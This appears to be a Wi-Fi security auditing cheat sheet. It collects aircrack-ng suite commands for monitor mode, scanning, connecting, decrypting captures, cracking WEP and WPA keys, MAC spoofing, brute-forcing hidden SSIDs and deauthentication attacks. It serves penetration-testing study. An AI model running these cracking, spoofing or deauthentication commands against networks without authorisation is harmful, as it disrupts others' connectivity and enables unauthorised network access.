Commands

• SSID / ESSID = The network name (e.g. Casa_Mario, Vodafone1234).

• BSSID = the MAC address of the Access Point (e.g. 00:1A:2B:3C:4D:5E).

Tools

Aircrack-ng	WiFi security auditing tools suite. The Aircrack-ng suite encompasses over 20 tools tailored for auditing Wi-Fi networks (Airmon-ng, Airodump-ng, Airgraph-ng, Aireplay-ng, Airdecap-ng, Aircrack-ng, etc.).

Information

ifconfig [<IFACE>]
iwconfig [<IFACE>]

sudo airmon-ng

Driver Capabilities

iw list

Channel & Frequency

iwlist <IFACE> channel
iwlist <IFACE> frequency | grep Current

sudo ifconfig <IFACE> down
sudo iwconfig <IFACE> channel 64
sudo iwconfig <IFACE> freq "5.52G"
sudo ifconfig <IFACE> up

Interface Strenght

It depends on the region. Exceeding certain limits may be illegal in some countries.

iw reg get

sudo iw reg set US

In many cases, our interface will automatically set its power to the maximum in our region. To set it manually:

sudo ifconfig <IFACE> down
sudo iwconfig <IFACE> txpower 30
sudo ifconfig <IFACE> up

Monitor Mode

sudo ifconfig <IFACE> down
sudo iw <IFACE> set monitor control
sudo ifconfig <IFACE> up

sudo airmon-ng start <IFACE> [<CHANNEL>]
sudo airmon-ng stop <IFACEmon>

# Check for interfering processes
sudo airmon-ng check
# If we encounter problems during our engagement, we can terminate these processes
sudo airmon-ng check kill

Other Modes

Managed

sudo ifconfig <IFACE> down
sudo iwconfig <IFACE> mode managed
sudo ifconfig <IFACE> up

Master

We cannot simply set this with the iwconfig utility. Rather, we need what is referred to as a management daemon. This management daemon is responsible for responding to stations or clients connecting to our network. Commonly we would utilize hostapd for this task. As such, we would first want to create a sample configuration.

open.conf

interface=<IFACE>
driver=nl80211
ssid=SSID-Hello-World
channel=2
hw_mode=g

This configuration would simply bring up an open network with the name SSID-Hello-World. With this network configuration, we could bring it up with the following command.

sudo hostapd open.conf

Ad-hoc

sudo ifconfig <IFACE> down
sudo iwconfig <IFACE> mode ad-hoc
sudo ifconfig <IFACE> up

Mesh

sudo iw dev <IFACE> set type mesh

Scan

Available WiFi Networks

iwlist <IFACE> scan |  grep 'Cell\|Quality\|ESSID\|IEEE'

Scanning and Collecting

sudo airodump-ng <IFACEmon> [--write <FILENAME>] [-c <CHANNEL>,<OTHER>]

To scan across all available bands (2.4 GHz and 5 GHz)

sudo airodump-ng <IFACEmon> --band abg

Graph

Starting from an CSV airodump-ng dump.

Relationship Graph

Illustrates the connections between clients and access points.

sudo airgraph-ng -i <DUMP>.csv -g CAPR -o <OUTPUT>.png

N.B. it will not display any APs without connected clients.

Common Probe Graph

It shows which APs each client is trying to connect to by displaying the probes sent out by the clients.

sudo airgraph-ng -i <DUMP>.csv -g CPG -o <OUTPUT>.png

Connect to a network

FREE

sudo iwconfig <IFACE> essid <WIFI-NAME>

WEP

wep.conf

network={
    ssid="<NAME-NETWORK>"
    key_mgmt=NONE
    wep_key0=3C1C3A3BAB
    wep_tx_keyidx=0
}

sudo wpa_supplicant -c wep.conf -i <IFACE>

Complete the connection setup by obtaining an IP address (-r to remove)

sudo dhclient <IFACE> -r
sudo dhclient <IFACE>

WPA Personal Networks

wpa.conf

network={
    ssid="<NAME-NETWORK>"
    psk="<PASSWORD>"
}

sudo wpa_supplicant -c wpa.conf -i <IFACE>

Complete the connection setup by obtaining an IP address

sudo dhclient <IFACE> -r
sudo dhclient <IFACE>

If the network uses WPA3 instead of WPA2, we would need to add key_mgmt=SAE to our wpa_supplicant configuration file to connect to it.

WPA Enterprise

wpa_enterprsie.conf

network={
  ssid="<NAME-NETWORK>"
  key_mgmt=WPA-EAP
  identity="<DOMAIN>\<USER>"
  password="<PASSWORD>"
}

sudo wpa_supplicant -c wpa_enterprsie.conf -i <IFACE>

Complete the connection setup by obtaining an IP address

sudo dhclient <IFACE> -r
sudo dhclient <IFACE>

Decrypting

Removing Wireless Headers

Eliminate numerous frames from unencrypted capture file that are not relevant to our analysis.

airdecap-ng -b <BSSID> <FILE.pcap>

WEP

airdecap-ng -w <WEP-HEXKEY> <FILE.pcap>

WPA

airdecap-ng -p <WEP-PASSPHRASE> -e <ESSID> <FILE.pcap>

Cracking

aircrack-ng -S  # Benchmark 

WEP

Collect enough IVs

sudo airodump-ng --ivs <IFACEmon>

aircrack-ng -K <IVS.ivs>

WPA

You need to have a wordlist and capture a four-way handshake (EAPOL, four packets). It also works with only packets 2-3 or 3-4 of EAPOL.

aircrack-ng <FILE>.pcap -w <WORDLIST>

MAC address spoofing

sudo ifconfig <IFACE> down
sudo macchanger <IFACE> -m 3E:48:72:B7:62:2A
sudo ifconfig <IFACE> up

Attacks

Finding Hidden SSIDs

We can use Deauthentication. we can use aireplay-ng to send deauthentication requests to the client. When the client reconnects to the hidden SSID, airodump-ng will capture the request and reveal the SSID. However, deauthentication attacks do not work on WPA3 networks. Or you can use bruteforce. We can see the length while using airodump-ng.

mdk3	Bruteforce SSIDs. <STYLE> = upper case (u), digits (n), all printed (a), lower and upper case (c), lower and upper case plus numbers (m) sudo mdk3 wlan0mon p -b <STYLE> -c 1 -t <BSSID> sudo mdk3 wlan0mon p -f <WORDLIST> -t <BSSID>

Deauthentication

Test for packet injection

sudo iw dev wlan0mon set channel 1
sudo aireplay-ng --test wlan0mon

Deauthentication attack

sudo aireplay-ng -0 5 -a 00:14:6C:7A:41:81 -c 00:0F:B5:32:31:31 wlan0mon

-0 Deauth Attack, 5 n. pack send (0=continuously), -a Access Point, -c Client.